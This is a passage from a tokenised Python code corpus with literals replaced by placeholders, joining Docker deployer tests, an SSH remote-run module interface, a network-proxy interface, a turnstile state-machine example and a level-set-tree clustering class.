) <EOL> d . addCallback ( lambda _ : deployer . discover_state ( <EOL> DeploymentState ( nodes = { <EOL> NodeState ( hostname = deployer . hostname , uuid = deployer . node_uuid , <EOL> applications = [ ] , <EOL> manifestations = { } , paths = { } , devices = { } ) , <EOL> } ) , <EOL> persistent_state = PersistentState ( ) , <EOL> ) ) <EOL> return d <EOL> @ if_docker_configured <EOL> def test_links_lowercase ( self ) : <EOL> """<STR_LIT>""" <EOL> link = Link ( alias = u"<STR_LIT>" , <EOL> local_port = <NUM_LIT> , <EOL> remote_port = <NUM_LIT> ) <EOL> d = self . _start_container_for_introspection ( <EOL> links = [ link ] , <EOL> command_line = [ u"<STR_LIT>" , u"<STR_LIT>" , u"<STR_LIT>" , u"<STR_LIT>" ] ) <EOL> d . addCallback ( <EOL> lambda results : self . assertIn ( <EOL> pset ( [ link ] ) , <EOL> [ app . links for app in results . node_state . applications ] ) ) <EOL> return d <EOL> @ if_docker_configured <EOL> def test_command_line_introspection ( self ) : <EOL> """<STR_LIT>""" <EOL> command_line = pvector ( [ u"<STR_LIT>" , u"<STR_LIT>" , u"<STR_LIT>" , u"<STR_LIT>" ] ) <EOL> d = self . _start_container_for_introspection ( command_line = command_line ) <EOL> d . addCallback ( <EOL> lambda results : self . assertIn ( <EOL> command_line , <EOL> [ app . command_line for app in results . node_state . applications ] ) ) <EOL> return d <EOL> @ if_docker_configured <EOL> def test_memory_limit ( self ) : <EOL> """<STR_LIT>""" <EOL> EXPECTED_MEMORY_LIMIT = <NUM_LIT> <EOL> image = DockerImage . from_string ( u"<STR_LIT>" ) <EOL> application_name = random_name ( self ) <EOL> docker_client = DockerClient ( ) <EOL> self . addCleanup ( docker_client . remove , application_name ) <EOL> deployer = ApplicationNodeDeployer ( <EOL> u"<STR_LIT:localhost>" , docker_client , make_memory_network ( ) , <EOL> node_uuid = uuid4 ( ) ) <EOL> desired_state = Deployment ( nodes = frozenset ( [ <EOL> Node ( uuid = deployer . node_uuid , <EOL> applications = frozenset ( [ Application ( <EOL> name = application_name , <EOL> image = image , <EOL> memory_limit = EXPECTED_MEMORY_LIMIT <EOL> ) ] ) ) ] ) ) <EOL> d = change_node_state ( deployer , desired_state ) <EOL> d . addCallback ( lambda _ : wait_for_unit_state ( <EOL> reactor , <EOL> docker_client , <EOL> application_name , <EOL> [ u'<STR_LIT>' ] ) <EOL> ) <EOL> def inspect_application ( _ ) : <EOL> deferred_list = docker_client . list ( ) <EOL> def app_memory ( unit ) : <EOL> self . assertEqual ( unit . mem_limit , EXPECTED_MEMORY_LIMIT ) <EOL> deferred_list . addCallback ( find_unit , application_name ) <EOL> deferred_list . addCallback ( app_memory ) <EOL> return deferred_list <EOL> d . addCallback ( inspect_application ) <EOL> return d <EOL> @ flaky ( u'<STR_LIT>' ) <EOL> @ if_docker_configured <EOL> def test_cpu_shares ( self ) : <EOL> """<STR_LIT>""" <EOL> EXPECTED_CPU_SHARES = <NUM_LIT> <EOL> image = DockerImage . from_string ( u"<STR_LIT>" ) <EOL> application_name = random_name ( self ) <EOL> docker_client = DockerClient ( ) <EOL> self . addCleanup ( docker_client . remove , application_name ) <EOL> deployer = ApplicationNodeDeployer ( <EOL> u"<STR_LIT:localhost>" , docker_client , make_memory_network ( ) , <EOL> node_uuid = uuid4 ( ) ) <EOL> desired_state = Deployment ( nodes = frozenset ( [ <EOL> Node ( uuid = deployer . node_uuid , <EOL> applications = frozenset ( [ Application ( <EOL> name = application_name , <EOL> image = image , <EOL> cpu_shares = EXPECTED_CPU_SHARES <EOL> ) ] ) ) ] ) ) <EOL> d = change_node_state ( deployer , desired_state ) <EOL> d . addCallback ( lambda _ : wait_for_unit_state ( <EOL> reactor , <EOL> docker_client , <EOL> application_name , <EOL> [ u'<STR_LIT>' ] ) <EOL> ) <EOL> def inspect_application ( _ ) : <EOL> deferred_list = docker_client . list ( ) <EOL> def app_cpu_shares ( unit ) : <EOL> self . assertEqual ( unit . cpu_shares , EXPECTED_CPU_SHARES ) <EOL> deferred_list . addCallback ( find_unit , application_name ) <EOL> deferred_list . addCallback ( app_cpu_shares ) <EOL> return deferred_list <EOL> d . addCallback ( inspect_application ) <EOL> return d </s>
<s> from . _model import ( <EOL> run_network_interacting_from_args , sudo_network_interacting_from_args , <EOL> Run , run , run_from_args , <EOL> Sudo , sudo , sudo_from_args , <EOL> Put , put , <EOL> Comment , comment , <EOL> RunRemotely , run_remotely , <EOL> perform_comment , perform_put , perform_sudo <EOL> ) <EOL> __all__ = [ <EOL> "<STR_LIT>" , "<STR_LIT>" , <EOL> "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , <EOL> "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , <EOL> "<STR_LIT>" , "<STR_LIT>" , <EOL> "<STR_LIT>" , "<STR_LIT>" , <EOL> "<STR_LIT>" , "<STR_LIT>" , <EOL> "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , <EOL> ] <EOL> try : <EOL> from . _keys import ( <EOL> ensure_agent_has_ssh_key , <EOL> AgentNotFound , KeyNotFound <EOL> ) <EOL> __all__ += [ <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , "<STR_LIT>" <EOL> ] <EOL> except ImportError : <EOL> pass </s>
<s> """<STR_LIT>""" <EOL> from zope . interface import Attribute , Interface <EOL> class INetwork ( Interface ) : <EOL> """<STR_LIT>""" <EOL> logger = Attribute ( <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> def create_proxy_to ( ip , port ) : <EOL> """<STR_LIT>""" <EOL> def delete_proxy ( proxy ) : <EOL> """<STR_LIT>""" <EOL> def open_port ( port ) : <EOL> """<STR_LIT>""" <EOL> def delete_open_port ( port ) : <EOL> """<STR_LIT>""" <EOL> def enumerate_proxies ( ) : <EOL> """<STR_LIT>""" <EOL> def enumerate_open_ports ( ) : <EOL> """<STR_LIT>""" </s>
<s> """<STR_LIT>""" <EOL> from . . cluster_utils import TestTypes , make_cluster_id , MARKER <EOL> from ... testtools import TestCase <EOL> class MakeClusterIdTests ( TestCase ) : <EOL> """<STR_LIT>""" <EOL> def test_values_extracted ( self ) : <EOL> """<STR_LIT>""" <EOL> cluster_id = make_cluster_id ( TestTypes . ACCEPTANCE ) <EOL> self . assertEqual ( <EOL> ( TestTypes . ACCEPTANCE . value , MARKER ) , <EOL> ( cluster_id . clock_seq_hi_variant , cluster_id . node ) , <EOL> ) </s>
<s> import time <EOL> from twisted . python . constants import Names , NamedConstant <EOL> from machinist import ( <EOL> TransitionTable , MethodSuffixOutputer , constructFiniteStateMachine , <EOL> ) <EOL> from turnstilelib import TurnstileController <EOL> class TurnstileInput ( Names ) : <EOL> FARE_PAID = NamedConstant ( ) <EOL> ARM_UNLOCKED = NamedConstant ( ) <EOL> ARM_TURNED = NamedConstant ( ) <EOL> ARM_LOCKED = NamedConstant ( ) <EOL> class TurnstileOutput ( Names ) : <EOL> ENGAGE_LOCK = NamedConstant ( ) <EOL> DISENGAGE_LOCK = NamedConstant ( ) <EOL> class TurnstileState ( Names ) : <EOL> LOCKED = NamedConstant ( ) <EOL> UNLOCKED = NamedConstant ( ) <EOL> ACTIVE = NamedConstant ( ) <EOL> table = TransitionTable ( ) <EOL> table = table . addTransitions ( <EOL> TurnstileState . UNLOCKED , { <EOL> TurnstileInput . ARM_TURNED : <EOL> ( [ TurnstileOutput . ENGAGE_LOCK ] , TurnstileState . ACTIVE ) , <EOL> } ) <EOL> table = table . addTransitions ( <EOL> TurnstileState . ACTIVE , { <EOL> TurnstileInput . ARM_LOCKED : ( [ ] , TurnstileState . LOCKED ) , <EOL> TurnstileInput . ARM_UNLOCKED : ( [ ] , TurnstileState . UNLOCKED ) , <EOL> } ) <EOL> table = table . addTransitions ( <EOL> TurnstileState . LOCKED , { <EOL> TurnstileInput . FARE_PAID : <EOL> ( [ TurnstileOutput . DISENGAGE_LOCK ] , TurnstileState . ACTIVE ) , <EOL> } ) <EOL> class Turnstile ( object ) : <EOL> def __init__ ( self , hardware ) : <EOL> self . _hardware = hardware <EOL> def output_ENGAGE_LOCK ( self , engage ) : <EOL> self . _hardware . engageLock ( ) <EOL> def output_DISENGAGE_LOCK ( self , disengage ) : <EOL> self . _hardware . disengageLock ( ) <EOL> def main ( ) : <EOL> hardware = TurnstileController ( digitalPin = <NUM_LIT> ) <EOL> turnstileFSM = constructFiniteStateMachine ( <EOL> inputs = TurnstileInput , <EOL> outputs = TurnstileOutput , <EOL> states = TurnstileState , <EOL> table = table , <EOL> initial = TurnstileState . LOCKED , <EOL> richInputs = [ ] , <EOL> inputContext = { } , <EOL> world = MethodSuffixOutputer ( Turnstile ( hardware ) ) , <EOL> ) <EOL> while True : <EOL> if hardware . paymentMade ( ) : <EOL> hardware . resetNotification ( ) <EOL> turnstileFSM . receive ( TurnstileInput . FARE_PAID ) <EOL> elif hardware . armTurned ( ) : <EOL> hardware . resetNotification ( ) <EOL> turnstileFSM . receive ( TurnstileInput . ARM_TURNED ) <EOL> elif hardware . finishedLocking ( ) : <EOL> hardware . resetNotification ( ) <EOL> turnstileFSM . receive ( TurnstileInput . ARM_LOCKED ) <EOL> elif hardware . finishedUnlocking ( ) : <EOL> hardware . resetNotification ( ) <EOL> turnstileFSM . receive ( TurnstileInput . ARM_UNLOCKED ) <EOL> else : <EOL> time . sleep ( <NUM_LIT:0.1> ) </s>
<s> """<STR_LIT>""" <EOL> from __future__ import print_function as _print_function <EOL> from __future__ import absolute_import as _absolute_import <EOL> import logging as _logging <EOL> import copy as _copy <EOL> import pickle as _pickle <EOL> import debacl . utils as _utl <EOL> _logging . basicConfig ( level = _logging . INFO , datefmt = '<STR_LIT>' , <EOL> format = '<STR_LIT>' ) <EOL> try : <EOL> import numpy as _np <EOL> import networkx as _nx <EOL> from prettytable import PrettyTable as _PrettyTable <EOL> except : <EOL> raise ImportError ( "<STR_LIT>" + <EOL> "<STR_LIT>" ) <EOL> try : <EOL> import matplotlib . pyplot as _plt <EOL> from matplotlib . collections import LineCollection as _LineCollection <EOL> _HAS_MPL = True <EOL> except : <EOL> _HAS_MPL = False <EOL> _logging . warning ( "<STR_LIT>" + <EOL> "<STR_LIT>" ) <EOL> class ConnectedComponent ( object ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , idnum , parent , children , start_level , end_level , <EOL> start_mass , end_mass , members ) : <EOL> self . idnum = idnum <EOL> self . parent = parent <EOL> self . children = children <EOL> self . start_level = start_level <EOL> self . end_level = end_level <EOL> self . start_mass = start_mass <EOL> self . end_mass = end_mass <EOL> self . members = members <EOL> class LevelSetTree ( object ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , density = [ ] , levels = [ ] ) : <EOL> self . density = density <EOL> self . levels = levels <EOL> self . num_levels = len ( levels ) <EOL> self . prune_threshold = None <EOL> self . nodes = { } <EOL> self . _subgraphs = { } <EOL> def __repr__ ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . __str__ ( ) <EOL> def __str__ ( self ) : <EOL> """<STR_LIT>""" <EOL> summary = _PrettyTable ( [ "<STR_LIT:id>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , <EOL> "<STR_LIT>" , "<STR_LIT:size>" , "<STR_LIT>" , "<STR_LIT>" ] ) <EOL> for node_id , v in self . nodes . items ( ) : <EOL> summary . add_row ( [ node_id , <EOL> v . start_level , <EOL> v . end_level , <EOL> v . start_mass , <EOL> v . end_mass , <EOL> len ( v . members ) , <EOL> v . parent , <EOL> v . children ] ) <EOL> for col in [ "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" ] : <EOL> summary . float_format [ col ] = "<STR_LIT>" <EOL> return summary . get_string ( ) <EOL> def prune ( self , threshold ) : <EOL> """<STR_LIT>""" <EOL> return self . _merge_by_size ( threshold ) <EOL> def save ( self , filename ) : <EOL> """<STR_LIT>""" <EOL> with open ( filename , '<STR_LIT:wb>' ) as f : <EOL> _pickle . dump ( self , f , _pickle . HIGHEST_PROTOCOL ) <EOL> def plot ( self , form = '<STR_LIT>' , horizontal_spacing = '<STR_LIT>' , color_nodes = [ ] , <EOL> colormap = '<STR_LIT>' ) : <EOL> """<STR_LIT>""" <EOL> if not isinstance ( color_nodes , list ) : <EOL> raise TypeError ( "<STR_LIT>" ) <EOL> if not set ( color_nodes ) . issubset ( self . nodes . keys ( ) ) : <EOL> raise ValueError ( "<STR_LIT>" + <EOL> "<STR_LIT>" + <EOL> "<STR_LIT>" + <EOL> "<STR_LIT>" ) <EOL> gap = <NUM_LIT> <EOL> min_node_width = <NUM_LIT> <EOL> node_coords = { } <EOL> split_coords = { } <EOL> ix_root = _np . array ( [ k for k , v in self . nodes . iteritems ( ) <EOL> if v . parent is None ] ) <EOL> n_root = len ( ix_root ) <EOL> census = _np . array ( [ len ( self . nodes [ x ] . members ) for x in ix_root ] , <EOL> dtype = _np . float ) <EOL> n = sum ( census ) <EOL> seniority = _np . argsort ( census ) [ : : - <NUM_LIT:1> ] <EOL> ix_root = ix_root [ seniority ] <EOL> census = census [ seniority ] <EOL> if horizontal_spacing == '<STR_LIT>' : <EOL> weights = census / n <EOL> intervals = _np . cumsum ( weights ) <EOL> intervals = _np . insert ( intervals , <NUM_LIT:0> , <NUM_LIT:0.0> ) <EOL> else : <EOL> intervals = _np . linspace ( <NUM_LIT:0.0> , <NUM_LIT:1.0> , n_root + <NUM_LIT:1> ) <EOL> for i , ix in enumerate ( ix_root ) : <EOL> if form == '<STR_LIT>' : <EOL> branch = self . _construct_mass_map ( <EOL> ix , <NUM_LIT:0.0> , ( intervals [ i ] , intervals [ i + <NUM_LIT:1> ] ) , <EOL> horizontal_spacing ) <EOL> else : <EOL> branch = self . _construct_branch_map ( <EOL> ix , ( intervals [ i ] , intervals [ i + <NUM_LIT:1> ] ) , form , <EOL> horizontal_spacing , sort = True ) <EOL> branch_node_coords , branch_split_coords , _ , _ = branch <EOL> node_coords . update ( branch_node_coords ) <EOL> split_coords . update ( branch_split_coords ) <EOL> node_widths = { k : max ( min_node_width , <NUM_LIT> * len ( node . members ) / n ) <EOL> for k , node in self . nodes . items ( ) } <EOL> primary_ticks = [ ( x [ <NUM_LIT:0> ] [ <NUM_LIT:1> ] , x [ <NUM_LIT:1> ] [ <NUM_LIT:1> ] ) for x in node_coords . values ( ) ] <EOL> primary_ticks = _np . unique ( _np . array ( primary_ticks ) . flatten ( ) ) <EOL> primary_labels = [ str ( round ( tick , <NUM_LIT:2> ) ) for tick in primary_ticks ] <EOL> fig , ax = _plt . subplots ( ) <EOL> ax . set_position ( [ <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ] ) <EOL> ax . set_xlim ( ( - <NUM_LIT> , <NUM_LIT> ) ) <EOL> ax . set_xticks ( [ ] ) <EOL> ax . set_xticklabels ( [ ] ) <EOL> ax . yaxis . grid ( color = '<STR_LIT>' ) <EOL> ax . set_yticks ( primary_ticks ) <EOL> ax . set_yticklabels ( primary_labels ) <EOL> if form == '<STR_LIT>' : <EOL> kappa_max = max ( primary_ticks ) <EOL> ax . set_ylim ( ( - <NUM_LIT:1.0> * gap * kappa_max , <NUM_LIT> * kappa_max ) ) <EOL> ax . set_ylabel ( "<STR_LIT>" ) <EOL> elif form == '<STR_LIT>' : <EOL> ax . set_ylabel ( "<STR_LIT>" ) <EOL> ymin = min ( [ v . start_level for v in self . nodes . itervalues ( ) ] ) <EOL> ymax = max ( [ v . end_level for v in self . nodes . itervalues ( ) ] ) <EOL> rng = ymax - ymin <EOL> ax . set_ylim ( ymin - gap * rng , ymax + <NUM_LIT> * rng ) <EOL> elif form == '<STR_LIT>' : <EOL> ax . set_ylabel ( "<STR_LIT>" ) <EOL> ymin = min ( [ v . start_mass for v in self . nodes . itervalues ( ) ] ) <EOL> ymax = max ( [ v . end_mass for v in self . nodes . itervalues ( ) ] ) <EOL> rng = ymax - ymin <EOL> ax . set_ylim ( ymin - gap * rng , ymax + <NUM_LIT> * ymax ) <EOL> else : <EOL> raise ValueError ( '<STR_LIT>' ) <EOL> node_colors = { k : [ <NUM_LIT:0.0> , <NUM_LIT:0.0> , <NUM_LIT:0.0> , <NUM_LIT:1.0> ] for k , v in self . nodes . items ( ) } <EOL> palette = _plt . get_cmap ( colormap ) <EOL> colorset = palette ( _np . linspace ( <NUM_LIT:0> , <NUM_LIT:1> , len ( color_nodes ) ) ) <EOL> for i , ix in enumerate ( color_nodes ) : <EOL> subtree = self . _make_subtree ( ix ) <EOL> for ix_sub in subtree . nodes . keys ( ) : <EOL> node_colors [ ix_sub ] = list ( colorset [ i ] ) <EOL> line_coords = [ node_coords [ c ] for c in node_coords . keys ( ) ] <EOL> line_widths = [ node_widths [ c ] for c in node_coords . keys ( ) ] <EOL> line_colors = [ node_colors [ c ] for c in node_coords . keys ( ) ] <EOL> node_lines = _LineCollection ( line_coords , linewidths = line_widths , <EOL> colors = line_colors ) <EOL> ax . add_collection ( node_lines ) <EOL> line_coords = [ split_coords [ c ] for c in split_coords . keys ( ) ] <EOL> line_colors = [ node_colors [ c ] for c in split_coords . keys ( ) ] <EOL> split_lines = _LineCollection ( line_coords , colors = line_colors ) <EOL> ax . add_collection ( split_lines ) <EOL> return fig , node_coords , split_coords , node_colors <EOL> def get_clusters ( self , method = '<STR_LIT>' , fill_background = False , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> if method == '<STR_LIT>' : <EOL> labels = self . _leaf_cluster ( ) <EOL> elif method == '<STR_LIT>' : <EOL> required = set ( [ '<STR_LIT:k>' ] ) <EOL> if not set ( kwargs . keys ( ) ) . issuperset ( required ) : <EOL> raise ValueError ( "<STR_LIT>" + <EOL> "<STR_LIT>" ) <EOL> else : <EOL> k = kwargs . get ( '<STR_LIT:k>' ) <EOL> labels = self . _first_K_cluster ( k ) <EOL> elif method == '<STR_LIT>' : <EOL> required = set ( [ '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> if not set ( kwargs . keys ( ) ) . issuperset ( required ) : <EOL> raise ValueError ( "<STR_LIT>" + <EOL> "<STR_LIT>" ) <EOL> else : <EOL> threshold = kwargs . get ( '<STR_LIT>' ) <EOL> form = kwargs . get ( '<STR_LIT>' ) <EOL> labels = self . _upper_set_cluster ( threshold , form ) <EOL> elif method == '<STR_LIT>' : <EOL> required = set ( [ '<STR_LIT:k>' ] ) <EOL> if not set ( kwargs . keys ( ) ) . issuperset ( required ) : <EOL> raise ValueError ( "<STR_LIT>" + <EOL> "<STR_LIT>" ) <EOL> else : <EOL> k = kwargs . get ( '<STR_LIT:k>' ) <EOL> labels = self . _first_K_level_cluster ( k ) <EOL> else : <EOL> raise ValueError ( "<STR_LIT>" ) <EOL> if fill_background : <EOL> n = len ( self . density ) <EOL> full_labels = _np . vstack ( ( _np . arange ( n ) , [ - <NUM_LIT:1> ] * n ) ) . T <EOL> full_labels [ labels [ : , <NUM_LIT:0> ] , <NUM_LIT:1> ] = labels [ : , <NUM_LIT:1> ] <EOL> labels = full_labels <EOL> return labels <EOL> def get_leaf_nodes ( self ) : <EOL> """<STR_LIT>""" <EOL> return [ k for k , v in self . nodes . items ( ) if v . children == [ ] ] <EOL> def branch_partition ( self ) : <EOL> """<STR_LIT>""" <EOL> points = [ ] <EOL> labels = [ ] <EOL> for ix , node in self . nodes . items ( ) : <EOL> branch_members = node . members . copy ( ) <EOL> for ix_child in node . children : <EOL> child_node = self . nodes [ ix_child ] <EOL> branch_members . difference_update ( child_node . members ) <EOL> points . extend ( branch_members ) <EOL> labels += ( [ ix ] * len ( branch_members ) ) <EOL> partition = _np . array ( [ points , labels ] , dtype = _np . int ) . T <EOL> return partition <EOL> def _make_subtree ( self , ix ) : <EOL> """<STR_LIT>""" <EOL> T = LevelSetTree ( ) <EOL> T . nodes [ ix ] = _copy . deepcopy ( self . nodes [ ix ] ) <EOL> T . nodes [ ix ] . parent = None <EOL> queue = self . nodes [ ix ] . children [ : ] <EOL> while len ( queue ) > <NUM_LIT:0> : <EOL> branch_ix = queue . pop ( ) <EOL> T . nodes [ branch_ix ] = self . nodes [ branch_ix ] <EOL> queue += self . nodes [ branch_ix ] . children <EOL> return T <EOL> def _merge_by_size ( self , threshold ) : <EOL> """<STR_LIT>""" <EOL> tree = _copy . deepcopy ( self ) <EOL> tree . prune_threshold = threshold <EOL> small_roots = [ k for k , v in tree . nodes . iteritems ( ) <EOL> if v . parent is None and len ( v . members ) <= threshold ] <EOL> for root in small_roots : <EOL> root_tree = tree . _make_subtree ( root ) <EOL> for ix in root_tree . nodes . iterkeys ( ) : <EOL> del tree . nodes [ ix ] <EOL> parents = [ k for k , v in tree . nodes . iteritems ( ) <EOL> if len ( v . children ) >= <NUM_LIT:1> ] <EOL> parents = _np . sort ( parents ) [ : : - <NUM_LIT:1> ] <EOL> for ix_parent in parents : <EOL> parent = tree . nodes [ ix_parent ] <EOL> kid_size = { k : len ( tree . nodes [ k ] . members ) for k in parent . children } <EOL> n_bigkid = sum ( _np . array ( kid_size . values ( ) ) >= threshold ) <EOL> if n_bigkid == <NUM_LIT:0> : <EOL> parent . end_level = max ( [ tree . nodes [ k ] . end_level <EOL> for k in parent . children ] ) <EOL> parent . end_mass = max ( [ tree . nodes [ k ] . end_mass <EOL> for k in parent . children ] ) <EOL> for k in parent . children : <EOL> del tree . nodes [ k ] <EOL> parent . children = [ ] <EOL> elif n_bigkid == <NUM_LIT:1> : <EOL> pass <EOL> ix_bigkid = [ k for k , v in kid_size . iteritems ( ) <EOL> if v >= threshold ] [ <NUM_LIT:0> ] <EOL> bigkid = tree . nodes [ ix_bigkid ] <EOL> parent . end_level = bigkid . end_level <EOL> parent . end_mass = bigkid . end_mass <EOL> for c in bigkid . children : <EOL> tree . nodes [ c ] . parent = ix_parent <EOL> for k in parent . children : <EOL> if k != ix_bigkid : <EOL> del tree . nodes [ k ] <EOL> parent . children = bigkid . children <EOL> del tree . nodes [ ix_bigkid ] <EOL> else : <EOL> pass <EOL> return tree <EOL> def _leaf_cluster ( self ) : <EOL> """<STR_LIT>""" <EOL> leaves = self . get_leaf_nodes ( ) <EOL> points = [ ] <EOL> cluster = [ ] <EOL> for leaf in leaves : <EOL> points . extend ( self . nodes [ leaf ] . members ) <EOL> cluster += ( [ leaf ] * len ( self . nodes [ leaf ] . members ) ) <EOL> labels = _np . array ( [ points , cluster ] , dtype = _np . int ) . T <EOL> return labels <EOL> def _first_K_cluster ( self , k ) : <EOL> """<STR_LIT>""" <EOL> parents = _np . array ( [ u for u , v in self . nodes . items ( ) <EOL> if len ( v . children ) > <NUM_LIT:0> ] ) <EOL> roots = [ u for u , v in self . nodes . items ( ) if v . parent is None ] <EOL> splits = [ self . nodes [ u ] . end_level for u in parents ] <EOL> order = _np . argsort ( splits ) <EOL> star_parents = parents [ order [ : ( k - len ( roots ) ) ] ] <EOL> children = [ u for u , v in self . nodes . items ( ) if v . parent is None ] <EOL> for u in star_parents : <EOL> children += self . nodes [ u ] . children <EOL> nodes = [ x for x in children if <EOL> sum ( _np . in1d ( self . nodes [ x ] . children , children ) ) == <NUM_LIT:0> ] <EOL> points = [ ] <EOL> cluster = [ ] <EOL> for c in nodes : <EOL> cluster_pts = self . nodes [ c ] . members <EOL> points . extend ( cluster_pts ) <EOL> cluster += ( [ c ] * len ( cluster_pts ) ) <EOL> labels = _np . array ( [ points , cluster ] , dtype = _np . int ) . T <EOL> return labels <EOL> def _upper_set_cluster ( self , threshold , form = '<STR_LIT>' ) : <EOL> """<STR_LIT>""" <EOL> if form == '<STR_LIT>' : <EOL> density_level = self . _mass_to_density ( mass = threshold ) <EOL> return self . _upper_set_cluster ( threshold = density_level , <EOL> form = '<STR_LIT>' ) <EOL> else : <EOL> upper_level_set = _np . where ( _np . array ( self . density ) > threshold ) [ <NUM_LIT:0> ] <EOL> active_nodes = [ k for k , v in self . nodes . iteritems ( ) <EOL> if ( v . start_level <= threshold and <EOL> v . end_level > threshold ) ] <EOL> points = [ ] <EOL> cluster = [ ] <EOL> for c in active_nodes : <EOL> cluster_mask = _np . in1d ( upper_level_set , <EOL> list ( self . nodes [ c ] . members ) ) <EOL> cluster_pts = upper_level_set [ cluster_mask ] <EOL> points . extend ( cluster_pts ) <EOL> cluster += ( [ c ] * len ( cluster_pts ) ) <EOL> labels = _np . array ( [ points , cluster ] , dtype = _np . int ) . T <EOL> return labels <EOL> def _first_K_level_cluster ( self , k ) : <EOL> """<STR_LIT>""" <EOL> cut = self . _find_K_cut ( k ) <EOL> nodes = [ e for e , v in self . nodes . iteritems ( ) <EOL> if v . start_level <= cut and v . end_level > cut ] <EOL> points = [ ] <EOL> cluster = [ ] <EOL> for c in nodes : <EOL> cluster_pts = self . nodes [ c ] . members <EOL> points . extend ( cluster_pts ) <EOL> cluster += ( [ c ] * len ( cluster_pts ) ) <EOL> labels = _np . array ( [ points , cluster ] , dtype = _np . int ) . T <EOL> return labels <EOL> def _collapse_leaves ( self , active_nodes ) : <EOL> """<STR_LIT>""" <EOL> for ix in active_nodes : <EOL> subtree = self . _make_subtree ( ix ) <EOL> max_end_level = max ( [ v . end_level for v in subtree . nodes . values ( ) ] ) <EOL> max_end_mass = max ( [ v . end_mass for v in subtree . nodes . values ( ) ] ) <EOL> self . nodes [ ix ] . end_level = max_end_level <EOL> self . nodes [ ix ] . end_mass = max_end_mass <EOL> self . nodes [ ix ] . children = [ ] <EOL> for u in subtree . nodes . keys ( ) : <EOL> if u != ix : <EOL> del self . nodes [ u ] <EOL> def _find_K_cut ( self , k ) : <EOL> """<STR_LIT>""" <EOL> starts = [ v . start_level for v in self . nodes . itervalues ( ) ] <EOL> ends = [ v . end_level for v in self . nodes . itervalues ( ) ] <EOL> crits = _np . unique ( starts + ends ) <EOL> nclust = { } <EOL> for c in crits : <EOL> nclust [ c ] = len ( [ e for e , v in self . nodes . iteritems ( ) <EOL> if v . start_level <= c and v . end_level > c ] ) <EOL> width = _np . max ( nclust . values ( ) ) <EOL> if k in nclust . values ( ) : <EOL> cut = _np . min ( [ e for e , v in nclust . iteritems ( ) if v == k ] ) <EOL> else : <EOL> if width < k : <EOL> cut = _np . min ( [ e for e , v in nclust . iteritems ( ) if v == width ] ) <EOL> else : <EOL> ktemp = _np . min ( [ v for v in nclust . itervalues ( ) if v > k ] ) <EOL> cut = _np . min ( [ e for e , v in nclust . iteritems ( ) if v == ktemp ] ) <EOL> return cut <EOL> def _construct_branch_map ( self , ix , interval , form , horizontal_spacing , <EOL> sort ) : <EOL> """<STR_LIT>""" <EOL> children = _np . array ( self . nodes [ ix ] . children ) <EOL> n_child = len ( children ) <EOL> if n_child == <NUM_LIT:0> : <EOL> xpos = _np . mean ( interval ) <EOL> segments = { } <EOL> segmap = [ ix ] <EOL> splits = { } <EOL> splitmap = [ ] <EOL> if form == '<STR_LIT>' : <EOL> segments [ ix ] = ( <EOL> ( [ xpos , self . nodes [ ix ] . start_level ] , <EOL> [ xpos , self . nodes [ ix ] . end_level ] ) ) <EOL> else : <EOL> segments [ ix ] = ( <EOL> ( [ xpos , self . nodes [ ix ] . start_mass ] , <EOL> [ xpos , self . nodes [ ix ] . end_mass ] ) ) <EOL> else : <EOL> parent_range = interval [ <NUM_LIT:1> ] - interval [ <NUM_LIT:0> ] <EOL> segments = { } <EOL> segmap = [ ix ] <EOL> splits = { } <EOL> splitmap = [ ] <EOL> census = _np . array ( [ len ( self . nodes [ x ] . members ) for x in children ] , <EOL> dtype = _np . float ) <EOL> weights = census / sum ( census ) <EOL> if sort is True : <EOL> seniority = _np . argsort ( weights ) [ : : - <NUM_LIT:1> ] <EOL> children = children [ seniority ] <EOL> weights = weights [ seniority ] <EOL> if horizontal_spacing == '<STR_LIT>' : <EOL> child_intervals = _np . cumsum ( weights ) <EOL> child_intervals = _np . insert ( child_intervals , <NUM_LIT:0> , <NUM_LIT:0.0> ) <EOL> elif horizontal_spacing == '<STR_LIT>' : <EOL> child_intervals = _np . linspace ( <NUM_LIT:0.0> , <NUM_LIT:1.0> , n_child + <NUM_LIT:1> ) <EOL> else : <EOL> raise ValueError ( "<STR_LIT>" + <EOL> "<STR_LIT>" + <EOL> "<STR_LIT>" ) <EOL> for j , child in enumerate ( children ) : <EOL> branch_interval = ( <EOL> interval [ <NUM_LIT:0> ] + child_intervals [ j ] * parent_range , <EOL> interval [ <NUM_LIT:0> ] + child_intervals [ j + <NUM_LIT:1> ] * parent_range ) <EOL> branch = self . _construct_branch_map ( child , branch_interval , <EOL> form , horizontal_spacing , <EOL> sort ) <EOL> branch_segs , branch_splits , branch_segmap , branch_splitmap = branch <EOL> segmap += branch_segmap <EOL> splitmap += branch_splitmap <EOL> splits = dict ( splits . items ( ) + branch_splits . items ( ) ) <EOL> segments = dict ( segments . items ( ) + branch_segs . items ( ) ) <EOL> children_xpos = _np . array ( [ segments [ k ] [ <NUM_LIT:0> ] [ <NUM_LIT:0> ] for k in children ] ) <EOL> xpos = _np . mean ( children_xpos ) <EOL> for child in children : <EOL> splitmap . append ( child ) <EOL> child_xpos = segments [ child ] [ <NUM_LIT:0> ] [ <NUM_LIT:0> ] <EOL> if form == '<STR_LIT>' : <EOL> splits [ child ] = ( <EOL> [ xpos , self . nodes [ ix ] . end_level ] , <EOL> [ child_xpos , self . nodes [ ix ] . end_level ] ) <EOL> else : <EOL> splits [ child ] = ( <EOL> [ xpos , self . nodes [ ix ] . end_mass ] , <EOL> [ child_xpos , self . nodes [ ix ] . end_mass ] ) <EOL> if form == '<STR_LIT>' : <EOL> segments [ ix ] = ( <EOL> ( [ xpos , self . nodes [ ix ] . start_level ] , <EOL> [ xpos , self . nodes [ ix ] . end_level ] ) ) <EOL> else : <EOL> segments [ ix ] = ( <EOL> ( [ xpos , self 